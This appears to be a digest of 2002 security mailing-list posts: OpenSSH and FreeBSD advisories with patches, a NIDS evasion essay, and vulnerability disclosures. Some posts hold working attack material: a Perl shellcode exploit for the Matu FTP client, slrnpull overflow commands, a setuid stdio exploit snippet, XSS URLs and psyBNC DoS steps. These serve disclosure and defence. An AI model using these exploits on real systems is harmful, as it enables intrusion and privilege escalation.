OpenSSH Security Advisory (adv.token)

[Niels Provos]

A buffer overflow exists in OpenSSH's sshd if sshd has been compiled
with Kerberos/AFS support and KerberosTgtPassing or AFSTokenPassing
has been enabled in the sshd_config file.  Ticket and token passing
is not enabled by default.

1. Systems affected:

All Versions of OpenSSH compiled with AFS/Kerberos support
and ticket/token passing enabled contain a buffer overflow.

Ticket/Token passing is disabled by default and available
only in protocol version 1.

2. Impact:

Remote users may gain privileged access for OpenSSH  2.9.9

Local users may gain privileged access for OpenSSH  3.3

No privileged access is possible for OpenSSH with
UsePrivsep enabled.

3. Solution:

Apply the following patch and replace radix.c with
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/radix.c?rev=1.18

4. Credits:

[EMAIL PROTECTED] for notifying the OpenSSH team.
http://mantra.freeweb.hu/

Appendix:

Index: bufaux.c
===
RCS file: /cvs/src/usr.bin/ssh/bufaux.c,v
retrieving revision 1.24
diff -u -r1.24 bufaux.c
--- bufaux.c26 Mar 2002 15:23:40 -  1.24
+++ bufaux.c19 Apr 2002 12:55:29 -
@@ -137,10 +137,18 @@
BN_bin2bn(bin, len, value);
xfree(bin);
 }
-
 /*
- * Returns an integer from the buffer (4 bytes, msb first).
+ * Returns integers from the buffer (msb first).
  */
+
+u_short
+buffer_get_short(Buffer *buffer)
+{
+   u_char buf[2];
+   buffer_get(buffer, (char *) buf, 2);
+   return GET_16BIT(buf);
+}
+
 u_int
 buffer_get_int(Buffer *buffer)
 {
@@ -158,8 +166,16 @@
 }

 /*
- * Stores an integer in the buffer in 4 bytes, msb first.
+ * Stores integers in the buffer, msb first.
  */
+void
+buffer_put_short(Buffer *buffer, u_short value)
+{
+   char buf[2];
+   PUT_16BIT(buf, value);
+   buffer_append(buffer, buf, 2);
+}
+
 void
 buffer_put_int(Buffer *buffer, u_int value)
 {
Index: bufaux.h
===
RCS file: /cvs/src/usr.bin/ssh/bufaux.h,v
retrieving revision 1.17
diff -u -r1.17 bufaux.h
--- bufaux.h18 Mar 2002 17:25:29 -  1.17
+++ bufaux.h19 Apr 2002 12:55:56 -
@@ -23,6 +23,9 @@
 void   buffer_get_bignum(Buffer *, BIGNUM *);
 void   buffer_get_bignum2(Buffer *, BIGNUM *);

+u_shortbuffer_get_short(Buffer *);
+void   buffer_put_short(Buffer *, u_short);
+
 u_int  buffer_get_int(Buffer *);
 voidbuffer_put_int(Buffer *, u_int);

FreeBSD Security Advisory FreeBSD-SA-02:23.stdio

[FreeBSD Security Advisories]

-BEGIN PGP SIGNED MESSAGE-

=
FreeBSD-SA-02:23.stdio  Security Advisory
  The FreeBSD Project

Topic:  insecure handling of stdio file descriptors

Category:   core
Module: kernel
Announced:  2002-04-22
Credits:Joost Pol [EMAIL PROTECTED]
Affects:All releases of FreeBSD up to and including 4.5-RELEASE
4.5-STABLE prior to the correction date
Corrected:  2002-04-21 13:06:45 UTC (RELENG_4)
2002-04-21 13:08:57 UTC (RELENG_4_5)
2002-04-21 13:10:51 UTC (RELENG_4_4)
FreeBSD only:   NO

I.   Background

By convention, POSIX systems associate file descriptors 0, 1, and 2
with standard input, standard output, and standard error,
respectively.  Almost all applications give these stdio file
descriptors special significance, such as writing error messages to
standard error (file descriptor 2).

In new processes, all file descriptors are duplicated from the parent
process.  Unless these descriptors are marked close-on-exec, they
retain their state during an exec.

All POSIX systems assign file descriptors in sequential order,
starting with the lowest unused file descriptor.  For example, if a
newly exec'd process has file descriptors 0 and 1 open, but file
descriptor 2 closed, and then opens a file, the new file descriptor is
guaranteed to be 2 (standard error).

II.  Problem Description

Some programs are set-user-id or set-group-id, and therefore run with
increased privileges.  If such a program is started with some of the
stdio file descriptors closed, the program may open a file and
inadvertently associate it with standard input, standard output, or
standard error.  The program may then read data from or write data to
the file inappropriately.  If the file is one that the user would
normally not have privileges to open, this may result in an
opportunity for privilege escalation.

III. Impact

Local users may gain superuser privileges.  It is known that the
`keyinit' set-user-id program is exploitable using this method.  There
may be other programs that are exploitable.

IV.  Workaround

None.  The set-user-id bit may be removed from `keyinit' using the
following command, but note that there may be other programs that can
be exploited.

# chmod 0555 /usr/bin/keyinit

V.   Solution

1) Upgrade your vulnerable system to 4.5-STABLE; or to either of the
RELENG_4_5 (4.5-RELEASE-p4) or RELENG_4_4 (4.4-RELEASE-p11) security
branches dated after the respective correction dates.

2) To patch your present system:

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch
# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:23/stdio.patch.asc

b) Execute the following commands as root:

# cd /usr/src
# patch  /path/to/patch

c) Recompile your kernel as described in
http://www.freebsd.org/handbook/kernelconfig.html and reboot the
system.

VI.  Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Path Revision
  Branch
- -
sys/sys/filedesc.h
  RELENG_4   1.19.2.4
  RELENG_4_5 1.19.2.3.6.1
  RELENG_4_4 1.19.2.3.4.1
sys/kern/kern_exec.c
  RELENG_4 1.107.2.14
  RELENG_4_5   1.107.2.13.2.1
  RELENG_4_41.107.2.8.2.2
sys/kern/kern_descrip.c
  RELENG_4  1.81.2.11
  RELENG_4_5 1.81.2.9.2.1
  RELENG_4_4 1.81.2.8.2.1
sys/conf/newvers.sh
  RELENG_4_51.44.2.20.2.5
  RELENG_4_4   1.44.2.17.2.10
- -

VII. References

PINE-CERT-20020401 URL:http://www.pine.nl/advisories/pine-cert-20020401.txt
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iQCVAwUBPMRPoFUuHi5z0oilAQE0/AP/R2qPI5bI2XIFgQ6FL+m4rUZ7M6VQzZqY
yzGskbEkG2LKTYPFQ/FF+Tx6ffbMicnyrTTvDcJ3F9lmKRNvPBVaOuiNBjkrLdQc
rerg2aHSJunQCkcd7f/+RjxtWO8wbjTM9TXmc8X1G9kJGaglCwEfHkZJzmsyGDyD
qjkDToXu9a8=
=oXDh
-END PGP SIGNATURE-

STANFORD CONFERENCE ON VULNERABILITY DISCLOSURE: Early Reg to Close Soon! (fwd)

[Adam Shostack]

- Forwarded message from Jennifer S. Granick [EMAIL PROTECTED] -

X-Sender: [EMAIL PROTECTED]
Date: Wed, 17 Apr 2002 10:05:27 -0800
To: [EMAIL PROTECTED]
From: Jennifer S. Granick [EMAIL PROTECTED]
Subject: STANFORD CONFERENCE ON VULNERABILITY DISCLOSURE: Early Reg to
 Close Soon!

The early registration for Stanford's Center for Internet and Society
Conference on Computer Security Vulnerability Disclosure is about to close. 
Register today!

http://cyberlaw.stanford.edu

Current Agenda:

Agenda
Conference on Cyber Security and Disclosure
Thursday, May 9, 2002
7:30 a.m. Registration  Continental Breakfast
8:30 a.m. Welcome and Introductions
John Place, Stanford Center for Internet  Society
8:45 a.m. Information Sharing and the Freedom of Information Act
Matt Richtel, The New York Times (moderator)
Harris Miller, Information Technology Association of America
Alan Morrison, Stanford Law School and Public Citizen Litigation Group
Paul Nicholas, President's Critical Infrastructure Protection Board, The White
House
Mark Rasch, Predictive Services
David Sobel, Electronic Privacy Information Center

10:15 a.m. Break
10:30 a.m. The Ethics of Disclosure
Edward Felten, Princeton University and Stanford Law School
Steven Lipner, Microsoft
Helen Nissenbaum, New York University (invited) 

12:00 p.m. Keynote Luncheon
Bruce Schneier
Founder and Chief Technical Officer
Counterpane Internet Security, Inc.
Crocker Garden, Stanford Law School 

1:30 p.m. Disclosure and the Computer Security Professional
Edward Felten, Princeton University and Stanford Law School (moderator)
Gary McGraw, Cigital
Emily Sebert, @stake, Inc.

3:15 Break

3:30 p.m. Disclosure and the Computer Security Freelancer
Jennifer Stisa Granick, Stanford Law School (moderator)
Minh-Hang Nguyen, 7 Pillars
Rain Forest Puppy, Independent
Lee Tien, Electronic Frontier Foundation
Michael Wilson, 7 Pillars
5:00 p.m. Closing Remarks
5:10 p.m. Conference Ends
--


Jennifer Stisa Granick, Esq.
Director, Law and Technology Clinic
Stanford Law School
Center for Internet and Society
559 Nathan Abbott Way
Stanford, California 94305

(650) 724-0014
(650) 723-4426 fax

[EMAIL PROTECTED]

- End forwarded message -

Redux: NIDS, fragrouter, and off-topic sanity [WAS: Snort exploit]

[Greg Shipley]

I was browsing last week's BUGTRAQ posts and found the thread on Snort,
fragrouter, and the supposed perils of NIDS evasion interesting.  Not
because these were necessarily ground-breaking topics, but more because
I'm amazed that people consider NIDS evasion, well, news.  Marty's comment
about the media having a field day on Snort's supposedly new failure(s) is
interesting in itself, as it drives home a) the fact that members of the
media are obviously turning to BUGTRAQ for news, but more importantly, b)
that the maturity of BUGTRAQ as a watchdog org has really come a long way.
However, these facts are good for keeping the heat on vendors to fix
flawed products, but bad for misunderstanding known issues.  But I
digress

A couple of comments about NIDS/evasion/normalization/other stuff that
some list members may, or may not, find useful:

- evasion vs. bugs: It shouldn't be news that many NIDS products can be
evaded in many ways.  Most of these failures are known design challenge
that NIDS vendors have faced for years.  However, I would be careful in
suggesting that they are bugs.  In many ways, posting to BUGTRAQ about
many of these NIDS evasion techniques would be synonymous to me posting a
discovery that I can tunnel non-compliant app traffic through my stateful
packet filtering firewall with ease.  Most veteran security practitioners
would probably respond with No duh, Greg, use a proxy-based firewall if
you are concerned with this 'problem.'  (read: known design issue)


- fragmentation and evasion: As many people pointed out, market leading
commercial firewalls such as Cisco's PIX and Checkpoint's Firewall-1 *DO
NOT* forward re-assembled packets that have been fragmented at Layer-3.
They may re-assemble them for internal inspection, but they spit them back
out onto the wire they way they received them.  And why do I mention
layer-3, you ask?  Because some higher-level protocols (RPC!) support
similar types of fragmentation - more things that can stymy that weary
NIDS.  Evasion techniques can executed at Layer-3 (IP fragmentation, for
example, that presents a challenge to the average NIDS as fragmented
packets can be re-assembled one of a gazillion ways) all the way up to
layer-7 (HTTP UNICODE, for example, which Mike Hall at Cisco was telling
me had TENS of THOUSANDS of combinations).  The point being that
possessing the layer-3 through layer-7 smarts to handle the bazillion ways
to evade inspection is an impressive challenge - AND ONE THAT THE FIREWALL
VENDORS FACE AS WELL.  Checkpoint FW-1 doesn't even perform TCP sequence
number inspection, but I'm not seeing BUGTRAQ posts on this topic...but I
digress again

Getting back on the topic at hand, again, back to the firewall analogy: if
you have a firewall that understands layer-7 protocols (Gauntlet, Raptor,
Sidewinder, etc.) then there is some hope for application-level checking,
but if you're using a product that is closer to a stateful packet filter
(Netscreen, Checkpoint, Cisco, etc.) you're more limited in what you can
do, inspection-wise.  Again, these are design issues, IMHO, and many of
them are faced by the NIDS space as well...which leads me to:


- normalization options: Commercial firewalls that normalize traffic, even
at layer-7, are coming.  I know of one (OneSecure IDP), and I know others
are on their way.  If people are really concerned about stopping as many
types of NIDS evasion techniques as possible, then they may wish to
consider looking at in-line normalizers, or pressure their vendors at
adding this functionality.  As a side note, I found Handley, Kreibic, and
Paxson's USENIX paper on the subject quite interesting, as they identified
something like 70 points of normalizations for IP, TCP, UDP, and ICMP
alone.  (See Appendix A at:
http://www.aciri.org/vern/papers/norm-usenix-sec-01.pdf)


- Comparing the anti-virus (AV) world to NIDS: Perhaps a relevant
comparison on some levels, but let's not forget that NIDS products vary in
design and inspection capabilities.  There are NIDS products on the market
(ISS' BlackICE, Intrusion.com's SecureNetPro, etc.) that have the ability
to perform Layer-7 protocol analysis/decoding, and can, in turn, detect
some unknown attack types.  For example, I know BlackICE detected some of
last year's IIS overflows before it was specifically programmed to (read:
the alert wasn't sig based, it was protocol based).  There are limitations
to signature models, yes.  And updating your IDS, much like updating your
AV solution, is important.  But grouping every NIDS product into the same
category and simply stating that it's not as accurate as, say, an AV
solution, is, well, misleading, IMHO.


- IDS devices as an actual defense mechanism: I will humbly suggest that
most NIDS solutions, in their current form, are monitoring/policy
compliance devices, not access-control ones.  I continue to be amazed at
people comparing NIDS to access-control mechanisms like firewalls.  Apples
vs. oranges, IMHO, but 

Slrnpull Buffer Overflow (-d parameter)

[Alex Hernandez]

Slrnpull Buffer Overflow (-d parameter) 
===


Author:

** Alex Hernandez [EMAIL PROTECTED]

** Thanks all the people from Spain and Argentina.
** Special Greets: White-B, Paco Spain, Gabriel M.

Thanks friends for all the research:

 
+ Solar Eclipse [EMAIL PROTECTED]
http://www.phreedom.org
+ Kevin Finisterre  [EMAIL PROTECTED]  
http://www.snosoft.com



Affected system:


Linux RH.6.2 Sparc64 and below versions.



Description:


Slrnpull is a pulling of news on RH6.2-sparc platform. It is 
installed in 
/usr/bin/slrnpull. On SPARC platform, it is configured to have 
setgid 
root attribute.

Slrnpull is used for pulling of news posts from NNTP news 
server, so it enables 
slrn to be used as offline newsreader. A security vulnerability 
in the product 
allows local users to overflow one of the parameter (-d) and 
cause the application
to execute arbitrary code. Since the program is setuid root, 
elevated privileges 
can be gained. 


slrnpull supports a command line parameter -d to 
specify  SPOOLDIR 
(Spool Directory associated with server).which would be used by 
an attacker 
to cause Buffer Overflow. With carefully constructed data, an 
attacker might 
be able to run arbitrary code with root privilege.

In case that the attacker provide an overlong filename (for 
example, longer
than 4091 bytes) for the -d, it would overflow a dynamic 
allocated buffer.
The attacker could modify arbitrary memory address (such as 
saved return 
address, and function pointer, etc.) with some features of 
malloc()/free() 
implementation by overwriting the border data structure of the 
next 
dynamic memory chunk.

On SPARC platform, attacker could obtain root group privilege;



Exploit:
==


Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on a sparc64

alex@Lab /tmp]$ uname -svrm
Linux 2.2.14-5.0 #1 Tue Mar 7 21:50:41 EST 2000 sparc64


[alex@Lab /tmp]$ ls -la /usr/bin/slrnpull
-rwxr-sx--1 news news48688 Feb  7  
2000 /usr/bin/slrnpull


[alex@Lab /tmp]$ /usr/bin/slrnpull -d `perl -e 'print A x 
4091'`
04/01/2002 22:23:11 ***File name too long.
04/01/2002 22:23:11 slrnpull started.
Segmentation fault



[alex@Lab /tmp]$


MAPPED WITH STRACE 

[alex@Lab /tmp]$ strace /usr/bin/slrnpull -d `perl -
e 'print A x 4091'`
execve(/usr/bin/slrnpull, [/usr/bin/slrnpull, -d, 

AAA
AAA

AAA

AAA

AAA

AAA

[...]


], [/* 23 vars */]) = 0
brk(0)  = 0x38e68
open(/etc/ld.so.preload, O_RDONLY)= -1 ENOENT (No such 
file or directory)
open(/etc/ld.so.cache, O_RDONLY)  = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=24315, ...}) = 0
mmap(NULL, 24315, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7001c000
close(3)= 0
open(/usr/lib/libslang.so.1, O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=315158, ...}) = 0
read(3, \177ELF\1\2\1\0\0\0\0\0\0\0\0\0\0\3\0\2\0\0\0\1\0\0
\254..., 8192) = 8192
mmap(NULL, 386256, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 
0x7002c000
mprotect(0x70066000, 148688, PROT_NONE) = 0
mmap(0x7006c000, 65536, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED, 3, 0x3) = 0x7006c000
mmap(0x7007c000, 58576, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7007c000
close(3)= 0
open(/lib/libm.so.6, O_RDONLY)= 3
fstat(3, {st_mode=S_IFREG|0755, st_size=790032, ...}) = 0
read(3, \177ELF\1\2\1\0\0\0\0\0\0\0\0\0\0\3\0\2\0\0\0\1\0\0
\201..., 8192) = 8192
mmap(NULL, 277016, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 
0x7008c000
mprotect(0x700c, 64024, PROT_NONE)  = 0
mmap(0x700cc000, 16384, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED, 3, 0x3) = 0x700cc000
close(3)= 0
open(/lib/libc.so.6, O_RDONLY)= 3
fstat(3, {st_mode=S_IFREG|0755, st_size=4384427, ...}) = 0
read(3, \177ELF\1\2\1\0\0\0\0\0\0\0\0\0\0\3\0\22\0\0\0\1\0\1
\353..., 8192) = 8192
mmap(NULL, 8192, PROT_READ|PROT_WRITE, 
MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x70022000
mmap(NULL, 1118552, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 
0x700d
mprotect(0x701c8000, 102744, PROT_NONE) = 0
mmap(0x701d, 57344, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED, 3, 0xf) = 0x701d
mmap(0x701de000, 12632, PROT_READ|PROT_WRITE|PROT_EXEC, 
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x701de000
close(3)= 0
munmap(0x7001c000, 24315)   = 0
personality(PER_LINUX)  = 0
getpid()   

psyBNC 2.3 DoS / bug

[nawok]

psyBNC 2.3 DoS / bug


:: Description

psyBNC 
(http://www.psychoid.lam3rz.de/psybnc.html) has a 
problem 
dealing with oversized passwords, making it possible 
to tie up all 
the connection slots and consume alot of CPU on the 
server.


:: Exploit

Create a program to do the following:

1. connect to the psyBNC daemon
2. send irc registraion information, e.g.:

   user a b c d [LF/0x10]
   nick abcd [LF/0x10]

3. send an oversized password (about 9000++ bytes):

   PASS oversized password [LF/0x10]

4. kill the connection


This will make psyBNC slowly consume more and 
more CPU, and 
the connection will not be closed, but kept in state 
CLOSE_WAIT.

In other words; by doing the procedure described 
above
many times (depending on the psyBNC configuration, 
3 is default)
you can lock up all the connection slots and make the
psyBNC daemon inaccessible for other clients.

Concerning the CPU usage, when testing this on my 
own box
the usage went from 0.1% to about 90.0% and the 
load average 
went from 0.0 to about 0.72.


:: Closing words

Somebody might have discovered this before, but not 
that i'm
aware of. Did some searching without any luck. The 
creator
of psyBNC has been contacted.

 - nawok [EMAIL PROTECTED]

Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio

[Theo de Raadt]

 Topic:  insecure handling of stdio file descriptors

They didn't say so, but this work was obviously based on:

RCS file: /cvs/src/sys/kern/kern_exec.c,v
...
revision 1.20
date: 1998/07/02 08:53:04;  author: deraadt;  state: Exp;  lines: +38 -1
for sugid procs ensure that fd 0-2 are allocated slots (by pointing at
/dev/null -- future patch will use a dead vnode of some sort) to prevent
reuse (ie. new allocations) of these fd which libc makes many assumptions
about; problem noted by James Youngman

Pine Internet Advisory: Setuid application execution may give local root in FreeBSD

[Patrick Oonk]

-BEGIN PGP SIGNED MESSAGE-

 -
 Pine Internet Security Advisory
 -
 Advisory ID   : PINE-CERT-20020401
 Authors   : Joost Pol [EMAIL PROTECTED]
 Issue date: 2002-04-22 
 Application   : Multiple
 Version(s): Multiple 
 Platforms : FreeBSD confirmed, maybe others.
 Vendor informed   : 20020406 
 Availability  : http://www.pine.nl/advisories/pine-cert-20020401.txt
 -

Synopsis

It is possible for a local user to execute a suid application with 
stdin, stdout or stderr closed.

Impact

HIGH. Local users should be able to gain root privileges. 

Description

Consider the following (imaginary) suid application:

-- begin of imaginary code snippet

FILE * f = fopen(/etc/root_owned_file, r+);

if(f) {

fprintf(stderr, %s: fopen() succeeded\n, argv[0]);

fclose(f);
}

-- end of imaginary code snippet

Now, consider the following (imaginary) exploit:

-- begin of imaginary exploit snippet

while(dup(1) != -1); 

close(2);

execl(/path/to/suid_application,
  this text will endup in the root_owned_file, 0);

-- end of imaginary exploit snippet

Exploitation has been confirmed using the S/KEY binaries. 

Solution

FreeBSD source trees have been updated on the 21th of april 2002. 
Please cvsup.


-BEGIN PGP SIGNATURE-
Version: 2.6.3ia
Charset: noconv

iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
=AMED
-END PGP SIGNATURE-

-- 
 patrick oonk - pine internet - [EMAIL PROTECTED] - www.pine.nl/~patrick
 T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
 PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
 Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
 Excuse of the day: it has Intel Inside

Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio

[bert hubert]

 Credits:Joost Pol [EMAIL PROTECTED]

Joost rules. And my apologies to Pine for always being late paying my bills.
Sorry :-)

This is a simple test, executing a setuid process with filedescriptor 2
closed, and then opening a file and seeing what fd it gets.

Linux 2.2.16RedHat AXP  Not vulnerable (thanks fets)
Linux 2.5.6 Debian `Woody'  Not vulnerable
Linux 2.4.18Debian `Potato' Not vulnerable
OpenBSD 2.9 Not vulnerable (thanks dim)
OpenBSD 3.0 Not vulnerable (thanks sateh)
OpenBSD 3.1 Not vulnerable (thanks dim)
OS X 10.1.4 Not vulnerable (thanks sateh)
NetBSD 1.4.2Not vulnerable (thanks bounce)
Solaris 2.5.1-2.5.8 Vulnerable

Code on http://ds9a.nl/setuid-fd-2.tar.gz 

For further tests, 'outer' might try to exhaust *all* available
filedescriptors except 0, 1 or 2. This is left as an exercise for the
reader, or maybe we will beat you to it. 

The trick is to leave enough fd's available for ld.so.

Regards,

bert

-- 
http://www.PowerDNS.com/pdns   Try our new database driven nameserver!
http://www.tk  the dot in .tk
http://lartc.org   Linux Advanced Routing  Traffic Control HOWTO

ALERT! ALERT! ALERT! ALERT! ALERT! hehehehe ;Pppppp

[gobbles]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Attached is advisory + local root exploit for screen 3.9.11.

Save yourself!

Love,
GOBBLES

Hush provide the worlds most secure, easy to use online applications - which solution 
is right for you?
HushMail Secure Email http://www.hushmail.com/
HushDrive Secure Online Storage http://www.hushmail.com/hushdrive/
Hush Business - security for your Business http://www.hush.com/
Hush Enterprise - Secure Solutions for your Enterprise http://www.hush.com/

Looking for a good deal on a domain name? 
http://www.hush.com/partners/offers.cgi?id=domainpeople

-BEGIN PGP SIGNATURE-
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAjzB+EsVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPbOYA
niChrHFh8QpzVq0ne5JLBkx1UVbQAJ9Dh/sB3NCalK2dlwplxraK5oGF6w==
=MIJu
-END PGP SIGNATURE-



screen-stuff.tgz
Description: GNU Zip compressed data

-BEGIN PGP SIGNATURE-
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wj8DBQA8wfg8HNGnlyGZsA8RAns+AJ0YylUk1gWJr8MGOz9Gj5CWv6wQ9gCgoclKuPhd
s+CsriqnkPOTv6x4pLA=
=sbHO
-END PGP SIGNATURE-

AIM Remote File Transfer/Direct Connection Vulnerability

[Sil]

AIM Remote File Transfer/Direct Connection 
Vulnerability

I Discovered this vulnerability while I was port 
scanning my brother(April 15th, 2002), he just 
happened to send me a file and the port scan 
connected and received the file instead of me... The 
next day(April 16th, 2002) I made a program to exploit 
the vulnerability. This is how the vulnerability works

When AIM gets a connection request or tries to 
connect to someone else it acts as a server, the 
program I made rapidly tries to connect to the target 
IP(every 450 milliseconds) on port 4443(Direct 
Connection) and 5190(File Transfer) it then intercepts 
the connection and steals whatever data the target 
sends, they can receive text from their friends but 
they cannot send it because all data they send gets 
sent to you, I don't know the Oscar protocol, but I'm 
sure that if you where to use it, you could send text 
back to the IM as the friend or maybe as a fake 
screen name, this could be used to trick the person 
into giving you passwords or personal information, 
even if the person just happened to send something 
like passwords.txt to their friend, you now have 
those passwords. 

The fix:
I think a fix would be simple, have AIM only connect to 
the IP of the person they are trying to connect to 
which would be retrieved by the AIM server(s), I 
wouldn't doubt there being ways to exploit this 
also..but it's a start.
A temporary way to protect from the file transfer spy 
would be to change the port in the AIM preferences 
dialog for file transfer to something other than 5190, it 
would be pretty hard for someone to guess what port 
you changed it to.

Data you could potentially steal:
pictures, files, text, passwords, movies, personal 
information, etc...

Well that concludes this article..., if you have any 
questions or comments please feel free to contact 
me.

(One last note: I am still fixing bugs and trying 
different things with the program, but when I am 
happy with it, I will post it on my site, it is called 
RAFTS which stands for Remote AIM File Transfer 
Spy)

-Joseph Musso a.k.a. Sil
www.silenttech.com
aim screen name: xlsillx
email: [EMAIL PROTECTED]

Philip Chinery's Guestbook 1.1 fails to filter out js/html

[Markus Arndt]

Target:
 Philip Chinery's Guestbook 1.1 (maybee older versions?)

Vendor:
 http://www.sector7g.de.vu

Notified Vendor:
 Sure

Affected Systems:
 Webservers that run Philip Chinery's Guestbook 1.1

Found by:
 Markus Arndt[EMAIL PROTECTED]

Short Description:
 Philip Chinery's Guestbook 1.1 fails to filter out JScript/HTML (CrossSiteScripting)

This nice lil' guestbook let's the owner choose to filter out Jscript- and/or 
HTML-entrys..
Let's see the start of it's sub where it saves an entry:

---code starts---

sub SaveData
{
if($kill_html == 1) {
$Text =~ s/([^]|\n)*//g;
}
   
if($kill_html == 2) {
$Text =~ s//lt;/g;
$Text =~ s//gt;/g;
}

if ($kill_java) {
$Text =~ s/!--(.|\n)*--//g;
}
$Text   =~ s/\n/nbsp;br/g;
$Text   =~ tr/|/ /;
$Text   =~ s/\t/nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;nbsp;/g;
$Text   =~ s/\cM//g;

---code ends---

That's all it filters out.. As we can see it does only filter the comment itself a 
user wrote!
For example the fields Name, EMail or Homepage are NOT checked!


So let's build an url to exploit this..

http://[target]/cgi-bin/guestbook.pl?action=signcwrite=noneName=scriptalert(gotcha!);/script[EMAIL PROTECTED]Text=css%20example

This would post a message that would display an alertbox on a visiotrs screen
when accessing the gb..

As I noticed the guestbook logs ipadresses but doesn't prevent spam.
It also automaticly redirects posters back to the mainguestbook-page.
That makes it very easy to post entrys that e.g. force visitors to spam the guestbook 
(really anoying).


Sorry for bad english, hope you can understand what i'm talkin' about. ;)


Markus Arndt[EMAIL PROTECTED]
http://skka.de
__
100 MB und noch mehr gute Gründe! Jetzt anmelden und profitieren. Da ist mehr 
für Sie drin unter http://club.web.de/?mc=021103

Matu FTP remote buffer overflow vulnerability

[Kanatoko]

Matu FTP remote buffer overflow vulnerability

/*---
 Description
---*/
Matu FTP is a Japanese FTP client software for Win32 Platform.
We found an exploitable buffer overflow problem in Matu FTP Version 1.74.
The buffer overflow occurs when a long string like

220 A.AAACRLF

is received by Matu FTP in the beginning of an FTP session.
This vulnerability allows malicious FTP server to execute 
an arbitrary code on client hosts.


/*---
 Vendor Status
---*/
Notified with no response


/*---
 POC
---*/
This exploit code is invoked as an FTP server through inetd.

#!/usr/local/bin/perl

#--
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko [EMAIL PROTECTED]
# http://www.jumperz.net/
#--
$|=1;

#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg  = \xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2;
$egg .= \x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7;
$egg .= \xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C;
$egg .= \x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB;
$egg .= \xFD\xE8\xD4\xFF\xFF\xFF;
$egg .= notepad.exe;

#egg_address = 0x0012F43C
$buf = \x90 x 217;
$buf .= $egg;
$buf .= A x 2;
$buf .= \x3C\xF4\x12\x00;
$buf .= B x 80;

print 220 $buf\r\n;

--

#sorry for the bad english

Kanatoko [EMAIL PROTECTED]
http://www.jumperz.net/(Japanese)

arp problem

[Bart³omiej]

Hi,

I have a small problem.
Situation:
We have linux box running kernel 2.4 with 2 NICs.
Let`s assume that
eth0 IP 10.1.1.1/8 MAC 11:11:11:11:11:11, 
eth1 IP 192.168.0.1/24 MAC 22:22:22:22:22:22

We can even safely set the eth1 interface down, remove a patchcord from
this interface or it can be dummy0 interface. 

On the second machine from network 10.0.0.0 (in our case 10.2.2.2) we try:
# arping 192.168.0.1
and we got the reply:
Unicast reply from 192.168.0.1 [11:11:11:11:11:11]  0.765ms

Looks strange - there is no proxy-arp turned on on any of the interfaces.

What can we do with this knowledge ? For example we can try to find
suspected masquerade machines in our network. 
It is also very easy to scan for private networks behind the suspected
machines.

We tried this under Linux kernel 2.4
This technique didn`t work with multihomed MS-Windows machine.
It didn`t work on cisco 2500 series either.

The questions are:
How to turn this off ? 
Is it only a feature of the kernel series 2.4 ?


-- 
Bartek Konarski
GPG/PGP Key: http://www.bss.pjwstk.edu.pl/bartek.asc




msg07625/pgp0.pgp
Description: PGP signature

vqServer Demo Files Cross-Site Scripting

[Matthew Murphy]

vqServer is a Windows web server written in Java.  It is an innovative
product, with support internally for Servlets, and external support for many
kinds of CGI, (EXE, Perl, ...)

However, some of the examples shipped in a default configuration of
vqServer contain multiple cross-site scripting vulnerabilities.  In one
case, it is possible to create a cookie-based(?) attack that persists
forever for a specific IP address.  This could be used to attack the target
via Cookie Scripting bugs in many known browsers.

Example:

(Requires Perl Interpreter)

http://localhost/cgi/vq/demos/respond.pl?SCRIPTalert(I%20should%20not%20b
